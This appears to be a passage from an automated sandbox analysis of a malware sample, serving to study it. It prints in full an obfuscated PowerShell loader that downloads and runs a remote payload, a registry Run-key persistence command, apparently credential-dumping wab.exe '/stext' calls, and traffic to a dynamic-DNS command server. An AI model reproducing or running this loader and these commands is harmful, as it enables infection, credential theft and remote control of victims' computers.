,lektr[Journal$ lcladhFAeonicauFripladlladdersdi,nisatbIntemper,vershoabum,sybgNglepert Subro,eOpisthosA,strin]Jaz,eta= ibrop$,lettebGUnde,feu Reph ti Ansv,rl PassivtScabbiesAnsgnin ');$Akrobat=Mikado ' skamfe$SmadrenESvmmendlForslageDevastecStnkpudtRhamnusr Isobu,odiagonadPeduncliUnstrenaFilatellUnwithdyIxodidszMgtediseNonaccrr.atapho.SystemaD sdvaneoKittieswVerse tnBrs frolHjesteroKorr,spaFjervgtdAf.temnFRastestiArkfde,lCr,dworeMithrai(Supiner$BestignSVristrep omdoebiPro,ptenBlindg,i PapirbtRetouc u,unkersbFejlbehe ayerdorSprogvicOverlreu fontinlGoyetiaaUnmedictReedlikeanattaf,Billard$SkeetbrN FurrileRecursidCydippegSeid mrrSapropeaNoege,hvAtt.akt)Marmo p ';$Nedgrav=$fireboot[0];Xylyl (Mikado 'Udso gt$Fly tengUn,nhablT,talssoBaarebub ScowedaSemikollDa idsf:Omf,rmaLC.orouseProgra.jKajakkeeKarbidlvAutoex rBevidstd PizziciStrong e Mis ikrB,ddestnu derhoeSnashessQual.ag1Malerin2Antithe9Incompr= Onc ov(coron.tTRyghvireFolkekusskubor,tHesitat-InformaPmismateaeksistetReequiphOfayscr Landsk$Trff.lsNFlyvereeAdo neddCellefogPsychoprKuglefoaKirurgevAs,hete)Misplan ');while (!$Lejevrdiernes129) {Xylyl (Mikado 'Sande,e$Basitemg Af,nnelStoushcoCivildobVerdensaDemilitlStartko:CongregtLark.omrdaisyssy ppositk aftrripEpisiorlH rmitia SekunddDizequ,eAf entnrTyvebetsMancipa=unstout$Afprikkt SupranrSamsvaruk,ittede Ejeste ') ;Xylyl $Akrobat;Xylyl (Mikado 'JdesmicSCe ebrotScrollea,inemasrLaughert aparth-Cardi pSKastanil Skak pe.atamane CostaepMrkbar Prostat4 fistul ');Xylyl (Mikado 'Bevogtn$ untasegBarse,vlTurdansoDosmersbBlegnetaLandingl Assent:Oste.naLHarrowmeSamucanjSmithieeO strukvPerfectr Indruld EchinoiOttili eHysterirU,seignnSyleconeUnexpersTys hed1 Co ege2Stangsp9Rastpla=Kryptis(Engra nTRenskreeSuperins CirkattPriserk-UtaalelP systema DoitsptHenvejrh .omspr Intervi$undespoNPerisyse BambusdNabogitgDebindsrKulturfaHidrrtev Pepton)fdninge ') ;Xylyl (Mikado 'beskfti$smre rag Igua.olap roaco H vnebbSanseapaSfartsblUndisag:Intour.HLsbarhejLitteraoEpi,hylr ThumbptEfterree S,prantFruitwoaSemi,bskFrem.rek LyskureSn bsninOvercom=Bl mmes$ SkaldygB.adgullOverwaro elelitbSkyllevaMisprovl Flydev:Imp rraU DejlignMesomordSpagheteSonogr,rIdeeltscViljeslrkammerje TilskasUdtrykstUerstat1Dackeri6Diedric0 Landst+Engleli+ Eart.m% A,etyl$pupilsbDTjenesti BalkarsGipsd.pk .rikkeoBac risgGopurakrResoluta .rydsff SukkeriSlutfass .lycopkSkibskie NoncussSnkning.KedushacbyudvikoPentecouSanguifn agpiedtSelvris ') ;$Spinituberculate=$Diskografiskes[$Hjortetakken];}$Forlngelseslovs=308238;$udenlandsdanskerne=30330;Xylyl (Mikado 'Nidoros$Er oldeg MilliblLiberalo Ch omebMetzgonaUndervalSimulat:SintredLToppunkvBronzeveparadism CollecaJan.erkn KidnapkWarehoueOveracurRntgenfnFarvetaeMercato Begrudg=Galagal Eje ahoGScalenoeGeneraltSubprep-MusedesC Lsr,fooLimen,enD.scocat,emisapecoronitnJagten.tI.terfi Multiv$Syrer iNAchesove Fo,srgd BaccalgThromborlienteraSagprosvfarvepr ');Xylyl (Mikado 'Syp.ere$Pros,avgAftvinglcibariooUformaabfremelsaBet linlR,stjer: Lrre,sUEsk,ldsn AnskuebPreplacrT,ssesuoSpildola Ra,pedc Mi,ieuha.simileKana iedKommise Blodser=Unhypot Kilomol[.epleteS Pentagy Bobes.sStegenetValvulae talblomInterre.aneurinC Lrest,oUbefjednPlastikvLskedr.e oolierrSolmodntHaglgev] Hypos :,rocivi: Sk,mplF etrolar.dringsogracioum JumperBAfterdaaGadel usIndenrieprogram6icteric4 VinderS Granult Sulphar IncaseiLondonen Nonparg Hovedr(persona$BautastLTaxaudlvTranspieSleth gmW.ltonbaMo phinnSanseorkAgariciejazzmusr MatsornBeregnieDiethyl)Skibspr ');Xylyl (Mikado 'Nove,in$StoachsgRevokselSystemeoGra.ciabIsomer.aEnfoldil gifted:Overh nUManicurrAgentureTempyogdUnrollme,ksekvetZin,ify edisma=Glycero Mollusc[UrgoniaSSin ulayNoncancsForetyptOverproeOveri.ym Kryd h.TelotreT R bstieEkviperx Sprogft L poli.bevilliEMatchsanBevislicSystempoBe onardForskriiM,lticonHalshvigTacheom]Acervat: ster,l:SolospiASpinketSM toposCbuskrseI,etoolsIBestykn.LavatoeG egisteedisapprtUds,yknS NondiftBo.tlbnrDa regniPhenospn rdigmogStikfor(Stuearr$TilhyllULegaliznliannatbNonsimurSpaanplo TophueaStanke,c Xip.ochmakro aeSmovsetd,ecolor)Hng,nde ');Xylyl (Mikado 'Klatvas$ryg,adeg StaveslYeom,nloAutomobbBestia a un.labl Telefo: ummertBTroloveeFakticir .esvrlibudg tslKassebgdUdgiftssElektro=Mistill$ Zamar,UOutbo,ir PestereGau.sfid Knarkee evaport T resn.ElixatisNoninteu OphidsbCuticulsN,ncommtinvent rSp.rrowiPsykotene,evatogRitu,li( Penepl$ ci iusFF,nansloHydrolorBrndk mlMelolonnTrst,trg.kftedeeSankthalDia,kopsS,beslaeF ockres enckesl MaadenoSwazilnvAngelihsSalgsch,Lutoses$NattelyuAs icsmdco,certeComputenSlvtjsslPostulaanontra.nHj.rnevdEncolors AnguludR,eoptaa mmersenParrings afspilkErkendeeSinopiarKorr,mpnGulfedpeTonomet)grund t ');Xylyl $Berilds;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Undialyzeds = 1;$Forespeech='Sub';$Forespeech+='strin';$Forespeech+='g';Function Mikado($Firebolted){$Martyrologic=$Firebolted.Length-$Undialyzeds;For($Femalizes49=7;$Femalizes49 -lt $Martyrologic;$Femalizes49+=8){$Trompetdyrenes+=$Firebolted.$Forespeech.Invoke( $Femalizes49, $Undialyzeds);}$Trompetdyrenes;}function Xylyl($nougats){. ($Sprinklervsken) ($nougats);}$Guilts=Mikado 'MisbirtMm alretoOblongiz MustafiEnglevilAfkol,nl Larigoa.alteri/Metagna5 Stab.l. egions0Asbku,h Untaun.(BelejriWAssociaiUdviklin bagestdRutscheoGejstliwSagsgansBlokpol IndonesNLaboratTo forme L.isure1,ladtan0 Ran.or.Apertne0rodknol;Sultegr algesi.W S,riveiAddi,ten Lin eb6Do.atio4Elaph.d;St.vnsb Enc,untxSeed ng6 ,ogica4Adiposi;Kvindes FutilizrRugbrdsv Transi: Nongol1Bun tsd2 Denoun1Bortdmm. Me,red0Opkalds)Delites arbejdsGPalaeogeArchesic,ekognoktkkendeoUpassel/Rouil.e2Spirant0Photote1Slutpun0eftertr0 Stumbl1Hu dehu0Recitat1Hjlpe,n elsenfFGossa ei SimultrUberegneIndeksefWharfraoAftalevx To.sio/Forvalt1Painles2Drivers1I,dsmig.Cocksho0Tantiem ';$Fuldbragtes=Mikado ' ImerinUForegris Redeareti.balerJunkboa-Bon.sesACatchm gSi kerheModer,inForrykttPletter ';$Spinituberculate=Mikado ' BrndemhIndividtindsendt BankospPau,eris.nnovat:Balleti/Fossaeu/V,lfundc Al inaa OddlegdKostskoeBlokadenSeend saAmatrskdCult kle GummibrOrangeaeO,tendegBogiemaaNy etipl.ositiooCardioms.envisn.Debtorsc GravhjoNonpuebm Endoph/Ti,glysTKlbebaaoMisderiicarcasslAdresseeFilmogrtSemicelp Fil,inaSjlsr.apEkspedii .aabenr Ol,gis.Rooti.rdRispendeHumpssaptevarmel Geestso LgnersyInbitsb>Universh,ogonghtSy,kemat An,etlp Chempa:Kommpre/ Melipo/ Anderum HysteraDiabetedKammendiJefest.bVetiveraThrowworStaalvroPlacenthInnuendiGlitr tl Paral.aFortonel Glairea,mmutabt,ontradwNonprodoHunde l. Futurod tudercu Mudredcover,igkDe.angsd Macrocnpho.osks verflu.Tbrudsso To.seirRadiovigBrasero/VolitioaVrvlehilAllainelTotalsy/PhrynidTEtymo oo Roque.i,nterkolFilialseAfviklit UdaandpJentjenaHjertevpChackeri DividerEskadre.AntisufdNonst meCater.npbackbitlFreestooUnpoisey,urstpa ';$Smedningens=Mikado 'Unbutto> Indici ';$Sprinklervsken=Mikado 'KontokbiVolumeteHemihe.x Slingr ';$Cagot='Dockizations60';$Tilskring = Mikado ' K,stnieJan.lerc Bra.dahHande.so Chapta Expansi%Vir uela Elatc p RoughcpPanegy,dsellehyaD.imonitinitialaAchroni%Novelet\ osenstCinhivemo DissennK nnikktParfumergraver,iLsegldeb Cod.scu Starquthamrendo Gas etr Rve agsOlibanu.EpichilPHopeiteaUudslukpscuttl. Th,race&Brysth,&Outrefo El borae ProgracBrnesprhHulsle o Witlos plackletAmphirh ';Xylyl (Mikado 'Endolys$CimbrisgWispliklVirkeliopolitikbD,trugcaBgede elKotylef: Dext,if Bl.stoiKroatisrSnow owe ,ignalbParenthoH,idlgeoSenioretDishono=.vyunde(Se nmshc JunglemStarrind Flush. Snuptag/Unenwovc.cicula Supergr$EnsformTR sideniSedlersl Essayes TrammikBotulinrEphebeuiAr.ejdsn DerivegScrimwi)Subclam ');Xylyl (Mikado 'Hyper,c$ Erotisg .rikkelSubd.ntoMesa.icb Blokada Sy,axalIrascib:Bug,hypDBice,tri BagtrasJenmakekMicr tyoTransakgOp,oegerFakticia Jeaporf KroniniViljenssFru.tlekSjattefelegemulsj.gtpro=Jellstu$PamphleSForsinkpChalleni MegalenToralhaiGennembtHumo riuSubd,vibUneffigeSk,ltonr.gsvinbc IlioisuAr,enohlMass oraGent getAcalycae F lset. VenstrsAlmenvepBor,deslEls,liniTopske.t.layful(Thermof$Ud.andsS Car.urmGalvanoeShillald P ogrenMateriaiDurriesnA.arerngEjendomeProtoclnStueflus reatta)Indisti ');$Spinituberculate=$Diskografiskes[0];$Illegitimated= (Mikado ' Immite$o ercrigEngramblDraughtoWharfsibShippi aRauwolflSh mpoo:Li.ehooE UnsecllTourellePenitencAtionertAntimonropflgnioTruebludIndavlei Tav.rna InterilInklu,eyOmvekslzSedimene DebatsrTi skri=ReekspoNNedmejneS ltierw Rustvo-Alchem O ntioxibFlja,tejEnchanteSchizo c Pourbot E curs su,keneSNon,oveyMicawbesSaturnitHormonoeOverprim undive.TrsklerNmateriaeNringentTythesr.T,pefliWNyreligeM,nkesmbDeaminaCNaringil stubblirhagioneCheilodnBrugermt');$Illegitimated+=$fireboot[1];Xylyl ($Illegitimated);Xylyl (Mikado 'Englify$Dift,ngE Orni hlVilkaareTr,nsmicSelvk,et aggadirUndtageoTraadkudGentiliiPortr,tapalliatlSor.kjoyTilstrbzEksercie Draftsrunnomin.AfsendeH Rapp leAeroplaaPrangerdPersoniePlanc.er Snitsls ,lektr[Journal$ lcladhFAeonicauFripladlladdersdi,nisatbIntemper,vershoabum,sybgNglepert Subro,eOpisthosA,strin]Jaz,eta= ibrop$,lettebGUnde,feu Reph ti Ansv,rl PassivtScabbiesAnsgnin ');$Akrobat=Mikado ' skamfe$SmadrenESvmmendlForslageDevastecStnkpudtRhamnusr Isobu,odiagonadPeduncliUnstrenaFilatellUnwithdyIxodidszMgtediseNonaccrr.atapho.SystemaD sdvaneoKittieswVerse tnBrs frolHjesteroKorr,spaFjervgtdAf.temnFRastestiArkfde,lCr,dworeMithrai(Supiner$BestignSVristrep omdoebiPro,ptenBlindg,i PapirbtRetouc u,unkersbFejlbehe ayerdorSprogvicOverlreu fontinlGoyetiaaUnmedictReedlikeanattaf,Billard$SkeetbrN FurrileRecursidCydippegSeid mrrSapropeaNoege,hvAtt.akt)Marmo p ';$Nedgrav=$fireboot[0];Xylyl (Mikado 'Udso gt$Fly tengUn,nhablT,talssoBaarebub ScowedaSemikollDa idsf:Omf,rmaLC.orouseProgra.jKajakkeeKarbidlvAutoex rBevidstd PizziciStrong e Mis ikrB,ddestnu derhoeSnashessQual.ag1Malerin2Antithe9Incompr= Onc ov(coron.tTRyghvireFolkekusskubor,tHesitat-InformaPmismateaeksistetReequiphOfayscr Landsk$Trff.lsNFlyvereeAdo neddCellefogPsychoprKuglefoaKirurgevAs,hete)Misplan ');while (!$Lejevrdiernes129) {Xylyl (Mikado 'Sande,e$Basitemg Af,nnelStoushcoCivildobVerdensaDemilitlStartko:CongregtLark.omrdaisyssy ppositk aftrripEpisiorlH rmitia SekunddDizequ,eAf entnrTyvebetsMancipa=unstout$Afprikkt SupranrSamsvaruk,ittede Ejeste ') ;Xylyl $Akrobat;Xylyl (Mikado 'JdesmicSCe ebrotScrollea,inemasrLaughert aparth-Cardi pSKastanil Skak pe.atamane CostaepMrkbar Prostat4 fistul ');Xylyl (Mikado 'Bevogtn$ untasegBarse,vlTurdansoDosmersbBlegnetaLandingl Assent:Oste.naLHarrowmeSamucanjSmithieeO strukvPerfectr Indruld EchinoiOttili eHysterirU,seignnSyleconeUnexpersTys hed1 Co ege2Stangsp9Rastpla=Kryptis(Engra nTRenskreeSuperins CirkattPriserk-UtaalelP systema DoitsptHenvejrh .omspr Intervi$undespoNPerisyse BambusdNabogitgDebindsrKulturfaHidrrtev Pepton)fdninge ') ;Xylyl (Mikado 'beskfti$smre rag Igua.olap roaco H vnebbSanseapaSfartsblUndisag:Intour.HLsbarhejLitteraoEpi,hylr ThumbptEfterree S,prantFruitwoaSemi,bskFrem.rek LyskureSn bsninOvercom=Bl mmes$ SkaldygB.adgullOverwaro elelitbSkyllevaMisprovl Flydev:Imp rraU DejlignMesomordSpagheteSonogr,rIdeeltscViljeslrkammerje TilskasUdtrykstUerstat1Dackeri6Diedric0 Landst+Engleli+ Eart.m% A,etyl$pupilsbDTjenesti BalkarsGipsd.pk .rikkeoBac risgGopurakrResoluta .rydsff SukkeriSlutfass .lycopkSkibskie NoncussSnkning.KedushacbyudvikoPentecouSanguifn agpiedtSelvris ') ;$Spinituberculate=$Diskografiskes[$Hjortetakken];}$Forlngelseslovs=308238;$udenlandsdanskerne=30330;Xylyl (Mikado 'Nidoros$Er oldeg MilliblLiberalo Ch omebMetzgonaUndervalSimulat:SintredLToppunkvBronzeveparadism CollecaJan.erkn KidnapkWarehoueOveracurRntgenfnFarvetaeMercato Begrudg=Galagal Eje ahoGScalenoeGeneraltSubprep-MusedesC Lsr,fooLimen,enD.scocat,emisapecoronitnJagten.tI.terfi Multiv$Syrer iNAchesove Fo,srgd BaccalgThromborlienteraSagprosvfarvepr ');Xylyl (Mikado 'Syp.ere$Pros,avgAftvinglcibariooUformaabfremelsaBet linlR,stjer: Lrre,sUEsk,ldsn AnskuebPreplacrT,ssesuoSpildola Ra,pedc Mi,ieuha.simileKana iedKommise Blodser=Unhypot Kilomol[.epleteS Pentagy Bobes.sStegenetValvulae talblomInterre.aneurinC Lrest,oUbefjednPlastikvLskedr.e oolierrSolmodntHaglgev] Hypos :,rocivi: Sk,mplF etrolar.dringsogracioum JumperBAfterdaaGadel usIndenrieprogram6icteric4 VinderS Granult Sulphar IncaseiLondonen Nonparg Hovedr(persona$BautastLTaxaudlvTranspieSleth gmW.ltonbaMo phinnSanseorkAgariciejazzmusr MatsornBeregnieDiethyl)Skibspr ');Xylyl (Mikado 'Nove,in$StoachsgRevokselSystemeoGra.ciabIsomer.aEnfoldil gifted:Overh nUManicurrAgentureTempyogdUnrollme,ksekvetZin,ify edisma=Glycero Mollusc[UrgoniaSSin ulayNoncancsForetyptOverproeOveri.ym Kryd h.TelotreT R bstieEkviperx Sprogft L poli.bevilliEMatchsanBevislicSystempoBe onardForskriiM,lticonHalshvigTacheom]Acervat: ster,l:SolospiASpinketSM toposCbuskrseI,etoolsIBestykn.LavatoeG egisteedisapprtUds,yknS NondiftBo.tlbnrDa regniPhenospn rdigmogStikfor(Stuearr$TilhyllULegaliznliannatbNonsimurSpaanplo TophueaStanke,c Xip.ochmakro aeSmovsetd,ecolor)Hng,nde ');Xylyl (Mikado 'Klatvas$ryg,adeg StaveslYeom,nloAutomobbBestia a un.labl Telefo: ummertBTroloveeFakticir .esvrlibudg tslKassebgdUdgiftssElektro=Mistill$ Zamar,UOutbo,ir PestereGau.sfid Knarkee evaport T resn.ElixatisNoninteu OphidsbCuticulsN,ncommtinvent rSp.rrowiPsykotene,evatogRitu,li( Penepl$ ci iusFF,nansloHydrolorBrndk mlMelolonnTrst,trg.kftedeeSankthalDia,kopsS,beslaeF ockres enckesl MaadenoSwazilnvAngelihsSalgsch,Lutoses$NattelyuAs icsmdco,certeComputenSlvtjsslPostulaanontra.nHj.rnevdEncolors AnguludR,eoptaa mmersenParrings afspilkErkendeeSinopiarKorr,mpnGulfedpeTonomet)grund t ');Xylyl $Berilds;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gfqj"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qhvctgdb"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qhvctgdb"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tbjutynvjjb"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 44.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 125.68.49.198.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 myfrontmannysix.ddns.net udp
CA 199.189.26.138:4939 myfrontmannysix.ddns.net tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 138.26.189.199.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
CA 199.189.26.138:4939 myfrontmannysix.ddns.net tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp

Files

memory/2728-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyqtrd1p.0hl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2728-6-0x00000295E6060000-0x00000295E6082000-memory.dmp

memory/2728-11-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/2728-12-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3956-15-0x0000000002C80000-0x0000000002CB6000-memory.dmp

memory/3956-16-0x0000000005750000-0x0000000005D78000-memory.dmp

memory/3956-17-0x0000000005700000-0x0000000005722000-memory.dmp

memory/3956-18-0x0000000005DF0000-0x0000000005E56000-memory.dmp

memory/3956-19-0x0000000005F90000-0x0000000005FF6000-memory.dmp

memory/3956-29-0x0000000006190000-0x00000000064E4000-memory.dmp

memory/3956-30-0x00000000065A0000-0x00000000065BE000-memory.dmp

memory/3956-31-0x00000000065D0000-0x000000000661C000-memory.dmp

memory/3956-32-0x0000000007EB0000-0x000000000852A000-memory.dmp

memory/3956-33-0x0000000006B20000-0x0000000006B3A000-memory.dmp

memory/3956-34-0x00000000078D0000-0x0000000007966000-memory.dmp

memory/3956-35-0x0000000006C40000-0x0000000006C62000-memory.dmp

memory/3956-36-0x0000000008AE0000-0x0000000009084000-memory.dmp

C:\Users\Admin\AppData\Roaming\Contributors.Pap

MD5 6d3d810b1b531a393dd8a200f17378b8
SHA1 bc31c057297d2b467a46d843030f1ff377f55f1e
SHA256 786447c3a5269cec661eb9e7bea51a58df805afaceb116677ff1974cc0d6d7df
SHA512 a77ecb7cc1d0bb183fdef43747f7156bd72e5fcb32e2e8c7671a926707b313245e08b682ce03b6b862f9f4ff1f62cf566d98fbde3384c67b60c0a2cb8dcbf358

memory/3956-38-0x0000000009090000-0x000000000A581000-memory.dmp

memory/2728-39-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/2728-40-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/2780-44-0x0000000001E10000-0x0000000003301000-memory.dmp

memory/2728-48-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/2204-51-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4052-52-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2204-53-0x0000000000400000-0x0000000000478000-memory.dmp

memory/5112-62-0x0000000000400000-0x0000000000424000-memory.dmp

memory/5112-61-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4052-60-0x0000000000400000-0x0000000000462000-memory.dmp

memory/5112-56-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4052-55-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2204-54-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\gfqj

MD5 18b6368b183e546a35847ae24b4b2913
SHA1 040545f7ac2c987d2a79b5e7f1cf9ab83bd25923
SHA256 54c101b6b1241b6a0574a66e5a5b9bddc6c60a4daf7338dba6fe3f65b27382af
SHA512 68ba8734016705cd12bf9d7ce41d5c823b2ec6ce9ee1ee7e9da9efcd9c88ef1f1b18148d91ad6a271c7a88d4ca098a99198ca709fcf217f9b1fa18f74c48d698

memory/2780-65-0x000000001FA60000-0x000000001FA79000-memory.dmp

memory/2780-69-0x000000001FA60000-0x000000001FA79000-memory.dmp

memory/2780-68-0x000000001FA60000-0x000000001FA79000-memory.dmp